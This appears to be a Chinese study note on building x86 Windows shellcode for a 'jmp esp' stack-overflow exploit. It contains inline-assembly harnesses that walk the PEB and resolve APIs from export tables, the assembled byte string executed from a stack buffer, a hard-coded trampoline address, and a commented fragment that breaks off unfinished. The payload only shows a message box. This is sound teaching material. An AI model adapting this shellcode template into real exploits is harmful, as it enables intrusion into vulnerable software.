利用 jmp esp的原理 windows中有很多这种指令 先用dbg找一个 再把shellcode 转成opcode可以先测试一下(代码与opcode在最后) 后面多搞一些90 90 因为有的函数有几个参数 运行

// ConsoleApplication2.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
// First test harness: runs a hand-written, position-independent x86-32 payload in place,
// expressed as MSVC inline assembly (32-bit builds only; x64 MSVC has no __asm).
// Every embedded string is addressed as [ebx - N], where ebx holds the address of tag_Next
// (popped right after "call tag_Next"), so the byte length of every instruction and string
// before tag_Next is part of the layout: changing any of them means recomputing every
// displacement. The fs:[0x30] PEB walk and the manual export-name scan in fun_GetProcAddress
// are the textbook API-resolution pattern that behavioural detection rules key on.
// The process ends inside ExitProcess; nothing below ever returns to C.
int _tmain(int argc, _TCHAR* argv[])
{
	__asm {
		pushad;                          // save all registers (never restored: ExitProcess ends the process)
		sub esp, 0x100;                  // scratch space below the saved registers
		jmp tag_Shellcode;               // skip over the embedded string table

		//[tag_Next-0x53] "GetProcAddress\0"  (14 chars + NUL; matches the lea [ebx - 0x53] in fun_GetProcAddress)
		_asm _emit(0x47) _asm _emit(0x65) _asm _emit(0x74) _asm _emit(0x50)
		_asm _emit(0x72) _asm _emit(0x6f) _asm _emit(0x63) _asm _emit(0x41)
		_asm _emit(0x64) _asm _emit(0x64) _asm _emit(0x72) _asm _emit(0x65)
		_asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)

		//[tag_Next-0x44] "LoadLibraryExA\0"
		_asm _emit(0x4c) _asm _emit(0x6f) _asm _emit(0x61) _asm _emit(0x64)
		_asm _emit(0x4c) _asm _emit(0x69) _asm _emit(0x62) _asm _emit(0x72)
		_asm _emit(0x61) _asm _emit(0x72) _asm _emit(0x79) _asm _emit(0x45)
		_asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)

		//[tag_Next-0x35]  "User32.dll\0"
		_asm _emit(0x55) _asm _emit(0x73) _asm _emit(0x65) _asm _emit(0x72)
		_asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2e) _asm _emit(0x64)
		_asm _emit(0x6c) _asm _emit(0x6c) _asm _emit(0x00)

		//[tag_Next-0x2A]  "MessageBoxA\0"
		_asm _emit(0x4d) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73)
		_asm _emit(0x61) _asm _emit(0x67) _asm _emit(0x65) _asm _emit(0x42)
		_asm _emit(0x6f) _asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)

		//[tag_Next-0x1E]  "ExitProcess\0"
		_asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x69) _asm _emit(0x74)
		_asm _emit(0x50) _asm _emit(0x72) _asm _emit(0x6f) _asm _emit(0x63)
		_asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)

		//[tag_Next-0x12]  "Hello World!\0"  (used as both message text and caption)
		_asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6c) _asm _emit(0x6c)
		_asm _emit(0x6f) _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6f)
		_asm _emit(0x72) _asm _emit(0x6c) _asm _emit(0x64) _asm _emit(0x21)
		_asm _emit(0x00)

		tag_Shellcode:
					 call tag_Next;                     // pushes the address of tag_Next as a return address
				 tag_Next:
					 pop ebx;                           // ebx = address of tag_Next: anchor for every [ebx - N] string reference
					 // PEB walk to the DllBase of the second module in the initialization-order list.
					 // The author treats that module as kernel32.dll; the order of this list differs
					 // between Windows versions -- TODO confirm on the target build.
					 mov esi, dword ptr fs : [0x30];    // esi = PEB
					 mov esi, [esi + 0x0c];             // esi = PEB->Ldr
					 mov esi, [esi + 0x1c];             // esi = InInitializationOrderModuleList.Flink (first entry)
					 mov esi, [esi];                    // esi = second entry
					 mov edx, [esi + 0x08];             // edx = that entry's DllBase

					 // eax = fun_GetProcAddress(edx = module base, ebx = string anchor)
					 push ebx;
					 push edx;
					 call fun_GetProcAddress;
					 mov esi, eax;                      // esi = GetProcAddress

					 // eax = GetProcAddress(module base, "LoadLibraryExA"); edx is saved around the call
					 push edx;
					 lea ecx, [ebx - 0x44];             // ecx -> "LoadLibraryExA"
					 push ecx;                          // lpProcName
					 push edx;                          // hModule
					 call eax;
					 pop edx;                           // edx = module base again

					 // fun_Payload(module base, LoadLibraryExA, GetProcAddress, string anchor).
					 // It never returns; if it did, execution would fall through into fun_GetProcAddress below.
					 push ebx;
					 push esi;
					 push eax;
					 push edx;
					 call fun_Payload;

				 fun_GetProcAddress:
					 // fun_GetProcAddress(module_base, string_anchor)
					 //   -> eax = module_base + RVA of the export whose name begins with the 14 bytes
					 //      at [string_anchor - 0x53] ("GetProcAddress").
					 // Locals: [ebp-4] = AddressOfFunctions VA, [ebp-8] = AddressOfNames VA,
					 //         [ebp-0xc] = AddressOfNameOrdinals VA.
					 // Preserves edx; clobbers eax, ebx, ecx, esi, edi, flags; callee pops its 2 args (retn 8).
					 // The name loop has no NumberOfNames bound: if the module lacks the export,
					 // the scan walks off the end of the name table.
					 push ebp;
					 mov ebp, esp;
					 sub esp, 0x0c;                     // three dword locals
					 push edx;                          // preserve the caller's edx (module base)

					 // locate the export directory: base + e_lfanew -> IMAGE_NT_HEADERS32; +0x78 -> export directory RVA
					 mov edx, [ebp + 0x08];             // edx = module base
					 mov esi, [edx + 0x3c];             // esi = IMAGE_DOS_HEADER.e_lfanew
					 lea esi, [edx + esi];              // esi = IMAGE_NT_HEADERS32 VA
					 mov esi, [esi + 0x78];             // esi = export directory RVA
					 lea esi, [edx + esi];              // esi = IMAGE_EXPORT_DIRECTORY VA
					 mov edi, [esi + 0x1c];             // AddressOfFunctions RVA
					 lea edi, [edx + edi];
					 mov[ebp - 0x04], edi;              // local1 = AddressOfFunctions VA
					 mov edi, [esi + 0x20];             // AddressOfNames RVA
					 lea edi, [edx + edi];
					 mov[ebp - 0x08], edi;              // local2 = AddressOfNames VA
					 mov edi, [esi + 0x24];             // AddressOfNameOrdinals RVA
					 lea edi, [edx + edi];
					 mov[ebp - 0x0c], edi;              // local3 = AddressOfNameOrdinals VA

					 // scan AddressOfNames: eax = index of the first name whose first 14 bytes match
					 xor eax, eax;
					 jmp tag_FirstCmp;
				 tag_CmpFunNameLoop:
					 inc eax;
				 tag_FirstCmp:
					 mov esi, [ebp - 0x08];
					 mov esi, [esi + 4 * eax];          // esi = name RVA for index eax
					 mov edx, [ebp + 0x08];
					 lea esi, [edx + esi];              // esi = name VA
					 mov ebx, [ebp + 0x0c];             // ebx = string anchor
					 lea edi, [ebx - 0x53];             // edi -> "GetProcAddress"
					 mov ecx, 0x0e;                     // compare 14 bytes; the terminating NUL is not compared
					 cld;
					 repe cmpsb;
					 jne tag_CmpFunNameLoop;            // ZF reflects the last byte compared

					 // name index -> ordinal (16-bit table entries)
					 mov esi, [ebp - 0x0c];
					 xor edi, edi;
					 mov di, [esi + eax * 2];           // edi = AddressOfNameOrdinals[eax]

					 // ordinal -> function RVA
					 mov edx, [ebp - 0x04];
					 mov esi, [edx + edi * 4];          // esi = AddressOfFunctions[ordinal]
					 mov edx, [ebp + 0x08];

					 // eax = module base + RVA
					 lea eax, [edx + esi];
					 pop edx;                           // restore the caller's edx
					 mov esp, ebp;
					 pop ebp;
					 retn 0x08;

				 fun_Payload:
					 // fun_Payload(kernel32_base, LoadLibraryExA, GetProcAddress, string_anchor)
					 //   [ebp+8] = module base, [ebp+0xc] = LoadLibraryExA, [ebp+0x10] = GetProcAddress,
					 //   [ebp+0x14] = string anchor; locals: [ebp-4] = MessageBoxA, [ebp-8] = ExitProcess.
					 // Does not return: ends in ExitProcess(0). No return value is checked for NULL.
					 push ebp;
					 mov ebp, esp;
					 sub esp, 0x08;
					 mov ebx, [ebp + 0x14];             // ebx = string anchor

					 // hUser32 = LoadLibraryExA("User32.dll", 0, 0); MessageBoxA = GetProcAddress(hUser32, "MessageBoxA")
					 lea ecx, [ebx - 0x35];             // ecx -> "User32.dll"
					 push 0;                            // dwFlags
					 push 0;                            // hFile
					 push ecx;                          // lpLibFileName
					 call[ebp + 0x0c];                  // LoadLibraryExA -> eax = hUser32
					 lea ecx, [ebx - 0x2A];             // ecx -> "MessageBoxA"
					 push ecx;                          // lpProcName
					 push eax;                          // hModule = hUser32
					 call[ebp + 0x10];                  // GetProcAddress
					 mov[ebp - 0x04], eax;              // local1 = MessageBoxA

					 // ExitProcess = GetProcAddress(kernel32_base, "ExitProcess")
					 lea ecx, [ebx - 0x1E];             // ecx -> "ExitProcess"
					 push ecx;                          // lpProcName
					 push[ebp + 0x08];                  // hModule = module base (param 1)
					 call[ebp + 0x10];                  // GetProcAddress
					 mov[ebp - 0x08], eax;              // local2 = ExitProcess

					 // MessageBoxA(0, "Hello World!", "Hello World!", 0); ExitProcess(0)
					 lea ecx, [ebx - 0x12];             // ecx -> "Hello World!"
					 push 0;                            // uType
					 push ecx;                          // lpCaption
					 push ecx;                          // lpText
					 push 0;                            // hWnd
					 call[ebp - 0x04];                  // MessageBoxA
					 push 0;                            // uExitCode
					 call[ebp - 0x08];                  // ExitProcess -- never returns
					 mov esp, ebp;                      // unreachable epilogue
					 pop ebp;
					 retn 0x10;
	}

	return 0;                            // unreachable: the payload ends in ExitProcess
}

#include "stdafx.h"
// Second test harness: the same payload as assembled bytes, placed in a stack buffer and
// entered with push/ret. This only works while the stack is executable; with DEP/NX in effect
// (the default for images linked with /NXCOMPAT) the first byte of the buffer faults.
// The byte string ends in a lone 0xC2: the final "retn 0x10" is missing its 16-bit operand,
// which is harmless only because the payload reaches ExitProcess before that instruction.
int _tmain(int argc, _TCHAR* argv[])
{
	char bShellcode[] = { "\x60\x81\xEC\x00\x01\x00\x00\xEB\x4E\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x53\x52\xE8\x14\x00\x00\x00\x8B\xF0\x52\x8D\x4B\xBC\x51\x52\xFF\xD0\x5A\x53\x56\x50\x52\xE8\x6E\x00\x00\x00\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x08\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC0\xEB\x01\x40\x8B\x75\xF8\x8B\x34\x86\x8B\x55\x08\x8D\x34\x32\x8B\x5D\x0C\x8D\x7B\xAD\xB9\x0E\x00\x00\x00\xFC\xF3\xA6\x75\xE3\x8B\x75\xF4\x33\xFF\x66\x8B\x3C\x46\x8B\x55\xFC\x8B\x34\xBA\x8B\x55\x08\x8D\x04\x32\x5A\x8B\xE5\x5D\xC2\x08\x00\x55\x8B\xEC\x83\xEC\x08\x8B\x5D\x14\x8D\x4B\xCB\x6A\x00\x6A\x00\x51\xFF\x55\x0C\x8D\x4B\xD6\x51\x50\xFF\x55\x10\x89\x45\xFC\x8D\x4B\xE2\x51\xFF\x75\x08\xFF\x55\x10\x89\x45\xF8\x8D\x4B\xEE\x6A\x00\x51\x51\x6A\x00\xFF\x55\xFC\x6A\x00\xFF\x55\xF8\x8B\xE5\x5D\xC2" };   // stack buffer; the size comes from the initializer, so embedded \x00 bytes are kept

	__asm {
		lea eax, bShellcode;             // eax = address of the buffer (stack memory)
		push eax;                        // use that address as a fake return address
		ret                              // pops it into eip: control transfers into the buffer
	}
	return 0;                            // unreachable: the payload ends in ExitProcess
}
"\x60\x81\xEC\x00\x01\x00\x00\xEB\x4E\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x53\x52\xE8\x14\x00\x00\x00\x8B\xF0\x52\x8D\x4B\xBC\x51\x52\xFF\xD0\x5A\x53\x56\x50\x52\xE8\x6E\x00\x00\x00\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x08\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC0\xEB\x01\x40\x8B\x75\xF8\x8B\x34\x86\x8B\x55\x08\x8D\x34\x32\x8B\x5D\x0C\x8D\x7B\xAD\xB9\x0E\x00\x00\x00\xFC\xF3\xA6\x75\xE3\x8B\x75\xF4\x33\xFF\x66\x8B\x3C\x46\x8B\x55\xFC\x8B\x34\xBA\x8B\x55\x08\x8D\x04\x32\x5A\x8B\xE5\x5D\xC2\x08\x00\x55\x8B\xEC\x83\xEC\x08\x8B\x5D\x14\x8D\x4B\xCB\x6A\x00\x6A\x00\x51\xFF\x55\x0C\x8D\x4B\xD6\x51\x50\xFF\x55\x10\x89\x45\xFC\x8D\x4B\xE2\x51\xFF\x75\x08\xFF\x55\x10\x89\x45\xF8\x8D\x4B\xEE\x6A\x00\x51\x51\x6A\x00\xFF\x55\xFC\x6A\x00\xFF\x55\xF8\x8B\xE5\x5D\xC2"


77460a9b  jmp esp 地址

{
0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,
0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72,
0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2E, 0x64, 0x6C,
0x6C, 0x00, 0x4D, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,
0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,
0x57, 0x6F, 0x72, 0x6C, 0x64, 0x21, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x64, 0x8B, 0x35,
0x30, 0x00, 0x00, 0x00, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x36, 0x8B, 0x56, 0x08, 0x53,
0x52, 0xE8, 0x14, 0x00, 0x00, 0x00, 0x8B, 0xF0, 0x52, 0x8D, 0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xD0,
0x5A, 0x53, 0x56, 0x50, 0x52, 0xE8, 0x6E, 0x00, 0x00, 0x00, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C,
0x52, 0x8B, 0x55, 0x08, 0x8B, 0x72, 0x3C, 0x8D, 0x34, 0x32, 0x8B, 0x76, 0x78, 0x8D, 0x34, 0x32,
0x8B, 0x7E, 0x1C, 0x8D, 0x3C, 0x3A, 0x89, 0x7D, 0xFC, 0x8B, 0x7E, 0x20, 0x8D, 0x3C, 0x3A, 0x89,
0x7D, 0xF8, 0x8B, 0x7E, 0x24, 0x8D, 0x3C, 0x3A, 0x89, 0x7D, 0xF4, 0x33, 0xC0, 0xEB, 0x01, 0x40,
0x8B, 0x75, 0xF8, 0x8B, 0x34, 0x86, 0x8B, 0x55, 0x08, 0x8D, 0x34, 0x32, 0x8B, 0x5D, 0x0C, 0x8D,
0x7B, 0xAD, 0xB9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xF3, 0xA6, 0x75, 0xE3, 0x8B, 0x75, 0xF4, 0x33,
0xFF, 0x66, 0x8B, 0x3C, 0x46, 0x8B, 0x55, 0xFC, 0x8B, 0x34, 0xBA, 0x8B, 0x55, 0x08, 0x8D, 0x04,
0x32, 0x5A, 0x8B, 0xE5, 0x5D, 0xC2, 0x08, 0x00, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x8B, 0x5D,
0x14, 0x8D, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8D, 0x4B, 0xD6, 0x51,
0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8D, 0x4B, 0xE2, 0x51, 0xFF, 0x75, 0x08, 0xFF, 0x55,
0x10, 0x89, 0x45, 0xF8, 0x8D, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xFC,
0x6A, 0x00, 0xFF, 0x55, 0xF8, 0x8B, 0xE5, 0x5D, 0xC2
};

// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"

/*		mov esi, dword ptr fs : [0x30]
		mov esi, [esi+0x0c]
		mov esi, [esi+0x1c]
		mov esi, [esi]
		mov ebx, [esi+0x08]
*/

// Third harness: a variant of the payload above with a smaller scratch area (0x20 instead of
// 0x100) and a different message string, which shifts every [ebx - N] string displacement
// by one byte relative to the first listing (-0x52, -0x43, -0x34, -0x29, -0x1D, -0x11).
// As before, ebx anchors on tag_Next and the byte length of everything before it is part of
// the layout. The jump target is written "tag_shellcode" while the label is "tag_Shellcode";
// this assembles only because MSVC treats __asm labels case-insensitively -- keep the
// spelling consistent. The process ends inside ExitProcess; nothing returns to C.
int _tmain(int argc, _TCHAR* argv[])
{
	__asm
	{
		pushad                           // save all registers (never restored)
		sub esp,0x20                     // scratch space
		jmp tag_shellcode                // skip the embedded string table (case differs from the label, see above)
		//[tag_Next-0x52] "GetProcAddress\0"
		_asm _emit(0x47) _asm _emit(0x65) _asm _emit(0x74) _asm _emit(0x50)
		_asm _emit(0x72) _asm _emit(0x6F) _asm _emit(0x63) _asm _emit(0x41)
		_asm _emit(0x64) _asm _emit(0x64) _asm _emit(0x72) _asm _emit(0x65)
		_asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
		//[tag_Next-0x43] "LoadLibraryExA\0"
		_asm _emit(0x4C) _asm _emit(0x6F) _asm _emit(0x61) _asm _emit(0x64)
		_asm _emit(0x4C) _asm _emit(0x69) _asm _emit(0x62) _asm _emit(0x72)
		_asm _emit(0x61) _asm _emit(0x72) _asm _emit(0x79) _asm _emit(0x45)
		_asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
		//[tag_Next-0x34] "User32.dll\0"
		_asm _emit(0x55) _asm _emit(0x73) _asm _emit(0x65) _asm _emit(0x72)
		_asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64)
		_asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00)
		//[tag_Next-0x29] "MessageBoxA\0"
		_asm _emit(0x4D) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73)
		_asm _emit(0x61) _asm _emit(0x67) _asm _emit(0x65) _asm _emit(0x42)
		_asm _emit(0x6F) _asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
		//[tag_Next-0x1D] "ExitProcess\0"
		_asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x69) _asm _emit(0x74)
		_asm _emit(0x50) _asm _emit(0x72) _asm _emit(0x6F) _asm _emit(0x63)
		_asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
		//[tag_Next-0x11] "Hello 15PB!\0"  (message text and caption; the bytes are 48 65 6C 6C 6F 20 31 35 50 42 21 00)
		_asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x6C)
		_asm _emit(0x6F) _asm _emit(0x20) _asm _emit(0x31) _asm _emit(0x35)
		_asm _emit(0x50) _asm _emit(0x42) _asm _emit(0x21) _asm _emit(0x00)
	tag_Shellcode:
		call tag_Next                    // pushes the address of tag_Next
	tag_Next:
		pop ebx                          // ebx = address of tag_Next: anchor for every [ebx - N] string reference

		// PEB walk to the DllBase of the second module in the initialization-order list.
		// The author treats it as kernel32.dll; the list order differs between Windows
		// versions -- TODO confirm on the target build.
		mov esi, dword ptr fs : [0x30]   // esi = PEB
		mov esi, [esi+0x0c]              // esi = PEB->Ldr (PEB_LDR_DATA)
		mov esi, [esi+0x1c]              // esi = InInitializationOrderModuleList.Flink (first entry)
		mov esi, [esi]                   // esi = second entry
		mov edx, [esi+0x08]              // edx = that entry's DllBase

		push ebx                         // param 2: string anchor
		push edx                         // param 1: module base
		call fun_GetProcAddress          // eax = GetProcAddress
		mov esi,eax                      // esi = GetProcAddress

		push edx                         // save module base across the call

		lea ecx, [ebx-0x43]              // ecx -> "LoadLibraryExA"
		push ecx                         // lpProcName
		push edx                         // hModule
		call eax                         // eax = GetProcAddress(module base, "LoadLibraryExA")

		pop edx                          // edx = module base again

		push ebx                         // param 4: string anchor
		push esi                         // param 3: GetProcAddress
		push eax                         // param 2: LoadLibraryExA
		push edx                         // param 1: module base
		call fun_Payload                 // never returns; a return would fall through into fun_GetProcAddress
	
		// Resolve an export by name; returns its VA in eax.
	fun_GetProcAddress:  //(module_base, string_anchor) -> eax = module_base + RVA of "GetProcAddress"
		// Locals: [ebp-4] = AddressOfFunctions VA, [ebp-8] = AddressOfNames VA, [ebp-0xc] = AddressOfNameOrdinals VA.
		// Preserves edx; clobbers eax, ebx, ecx, esi, edi, flags; pops its 2 args (retn 8).
		// The name loop has no NumberOfNames bound: a module without the export makes it run past the table.
		push ebp
		mov ebp,esp
		sub esp,0x0c                     // three dword locals
		push edx                         // preserve the caller's edx (module base)

		// locate the export directory and its three tables
		mov edx, [ebp+0x08]   //edx = module base (param 1)
		mov esi, [edx+0x3c]   //esi = IMAGE_DOS_HEADER.e_lfanew
		lea esi, [edx+esi]    //esi = IMAGE_NT_HEADERS32 VA
		mov esi, [esi+0x78]   //esi = export directory RVA (DataDirectory[EXPORT].VirtualAddress)
		lea esi, [edx+esi]    //esi = IMAGE_EXPORT_DIRECTORY VA
		mov edi, [esi+0x1c]   //AddressOfFunctions RVA
		lea edi, [edx+edi]    //AddressOfFunctions VA
		mov[ebp-0x04],edi     //local1 = AddressOfFunctions VA
		mov edi, [esi+0x20]   //AddressOfNames RVA
		lea edi, [edx+edi]    //AddressOfNames VA
		mov[ebp-0x08],edi     //local2 = AddressOfNames VA
		mov edi, [esi+0x24]   //AddressOfNameOrdinals RVA
		lea edi, [edx+edi]    //AddressOfNameOrdinals VA
		mov[ebp-0x0c],edi     //local3 = AddressOfNameOrdinals VA


		// scan AddressOfNames: eax = index of the first name whose first 14 bytes match
		xor eax,eax
		jmp tag_FirstCmp
	tag_CmpFunNameLoop:
		inc eax	
	tag_FirstCmp:
		mov esi, [ebp-0x08]         //esi = local2 (AddressOfNames VA)
		mov esi, [esi+4*eax]     //esi = name RVA for index eax
		mov edx, [ebp+0x08]      //edx = param 1 (module base)
		lea esi, [edx+esi]       //esi = name VA
		mov ebx, [ebp+0x0c]      //ebx = param 2 (string anchor)
		lea edi, [ebx-0x52]      //edi -> "GetProcAddress"
		mov ecx,0x0E             //ecx = 14 = strlen("GetProcAddress"); the terminating NUL is not compared
		cld
		repe cmpsb
		jne tag_CmpFunNameLoop   //ZF reflects the last byte compared

		mov esi, [ebp-0x0c]      //esi = local3 (AddressOfNameOrdinals VA)
		xor edi,edi
		mov di, [esi+eax*2]      //edi = ordinal for name index eax (16-bit entries)

		mov edx, [ebp-0x04]       //edx = local1 (AddressOfFunctions VA)
		mov esi, [edx+edi*4]      //esi = function RVA for that ordinal
		mov edx, [ebp+0x08]       //edx = param 1 (module base)

		lea eax, [edx+esi]        //eax = module base + RVA
		pop edx                   //restore the caller's edx
		mov esp,ebp
		pop ebp
		retn 0x08

	fun_Payload://(kernel32_base, LoadLibraryExA, GetProcAddress, string_anchor) -- never returns
		// [ebp+8] = module base, [ebp+0xc] = LoadLibraryExA, [ebp+0x10] = GetProcAddress, [ebp+0x14] = anchor;
		// locals: [ebp-4] = MessageBoxA, [ebp-8] = ExitProcess. No return value is checked for NULL.
		push ebp    
		mov ebp, esp
		sub esp, 0x08
		mov ebx, [ebp + 0x14]   //ebx = param 4 (string anchor)
		// hUser32 = LoadLibraryExA("User32.dll", 0, 0); MessageBoxA = GetProcAddress(hUser32, "MessageBoxA")
		lea ecx, [ebx - 0x34]   //ecx -> "User32.dll\0"
		push 0					//dwFlags = 0
		push 0					//hFile = 0
		push ecx                //lpLibFileName = "User32.dll"
		call[ebp + 0x0c]        //LoadLibraryExA() -> eax = hUser32
		lea ecx, [ebx - 0x29]   //ecx -> "MessageBoxA"
		push ecx                //lpProcName = "MessageBoxA"
		push eax                //hModule = hUser32
		call[ebp + 0x10]        //GetProcAddress()
		mov[ebp - 0x04], eax    //local1 = MessageBoxA
    // ExitProcess = GetProcAddress(kernel32_base, "ExitProcess")
		lea ecx, [ebx - 0x1D]     //ecx -> "ExitProcess\0"
		push ecx                  //lpProcName = "ExitProcess"
		push[ebp + 0x08]          //hModule = module base (param 1)
		call[ebp + 0x10]          //GetProcAddress()
		mov[ebp - 0x08], eax      //local2 = ExitProcess
    // MessageBoxA(0, "Hello 15PB!", "Hello 15PB!", 0); ExitProcess(0)
		lea ecx, [ebx - 0x11]     //ecx -> "Hello 15PB!"
		push 0                    //uType
		push ecx                  //lpCaption
		push ecx                  //lpText
		push 0                    //hWnd
		call[ebp - 0x04]          //MessageBoxA()
		push 0                    //uExitCode
		call[ebp - 0x08]          //ExitProcess() -- never returns
		mov esp,ebp               //unreachable epilogue
		pop ebp
		retn 0x10
	}
	return 0;                     // unreachable: the payload ends in ExitProcess
}





//FS:[0]->_TEB
//_TEB+0x30->PPEB
//PEB+0x0C->LDR

//LDR+0x0C->InLoadOrderModuleList
//LDR+0x14->InMemoryOrderModuleList



//LDR+0x1C->InInitializationOrderModuleList 
//InInitializationOrderModuleList+0x8->DllBase          


//DllBase+0x3C->PEHead   (IMAGE_DOS_HEADER.e_lfanew -> IMAGE_NT_HEADERS)
//PEHead+0x78->ET        (export directory RVA)
//ET+0x1C->EAT           (AddressOfFunctions)
//ET+0x20->ENT           (AddressOfNames)
//ET+0x24->EOT           (AddressOfNameOrdinals)

/*


int main()
{


__asm
	{
		call tag_GetShellCodeBaseAddr;
	tag_GetShellCodeBaseAddr:
		pop ebx;
		jmp tag_Code;

		//"LoadLibraryA"
		//VA:0x40100E
		//RVA to ShellCodeBaseAddr = 0x8
		__asm __emit(0x4c) __asm __emit(0x6f) __asm __emit(0x61) __asm __emit(0x64)
		__asm __emit(0x4c) __asm __emit(0x69) __asm __emit(0x62) __asm __emit(0x72)
		__asm __emit(0x61) __asm __emit(0x72) __asm __emit(0x79) __asm __emit(0x41)
		__asm __emit(0x00)

		//"GetProcAddress"
		//VA:0x40101B
		//RVA to ShellCodeBaseAddr = 0x15
		__asm __emit(0x47) __asm __emit(0x65) __asm __emit(0x74) __asm __emit(0x50)
		__asm __emit(0x72) __asm __emit(0x6f) __asm __emit(0x63) __asm __emit(0x41)
		__asm __emit(0x64) __asm __emit(0x64) __asm __emit(0x72) __asm __emit(0x65)
		__asm __emit(0x73) __asm __emit(0x73) __asm __emit(0x00)

		//"ExitProcess"
		//VA:0x40102A
		//RVA to ShellCodeBaseAddr = 0x24
		__asm __emit(0x45) __asm __emit(0x78) __asm __emit(0x69) __asm __emit(0x74)
		__asm __emit(0x50) __asm __emit(0x72) __asm __emit(0x6f) __asm __emit(0x63)
		__asm __emit(0x65) __asm __emit(0x73) __asm __emit(0x73) __asm __emit(0x00)

		//"MessageBoxA"
		//VA:0x401036
		//RVA to ShellCodeBaseAddr = 0x30
		__asm __emit(0x4d) __asm __emit(0x65) __asm __emit(0x73) __asm __emit(0x73)
		__asm __emit(0x61) __asm __emit(0x67) __asm __emit(0x65) __asm __emit(0x42)
		__asm __emit(0x6f) __asm __emit(0x78) __asm __emit(0x41) __asm __emit(0x00)

		//"Hello World!"
		//VA:0x401042
		//RVA to ShellCodeBaseAddr = 0x3C
		__asm __emit(0x48) __asm __emit(0x65) __asm __emit(0x6c) __asm __emit(0x6c)
		__asm __emit(0x6f) __asm __emit(0x20) __asm __emit(0x57) __asm __emit(0x6f)
		__asm __emit(0x72) __asm __emit(0x6c) __asm __emit(0x64) __asm __emit(0x21)
		__asm __emit(0x00)

		//"user32.dll"
		//VA:0x40104F
		//RVA to ShellCodeBaseAddr = 0x49
		__asm __emit(0x75) __asm __emit(0x73) __asm __emit(0x65) __asm __emit(0x72)
		__asm __emit(0x33) __asm __emit(0x32) __asm __emit(0x2e) __asm __emit(0x64)
		__asm __emit(0x6c) __asm __emit(0x6c) __asm __emit(0x00)

	tag_Code:
		push ebp;
		mov ebp, esp;
		sub esp, 0x100;
		sub ebp, 0x30;

		sub ebx, 0x5;
		mov[ebp + 0x4], ebx;//lpShellCodeBaseAddr

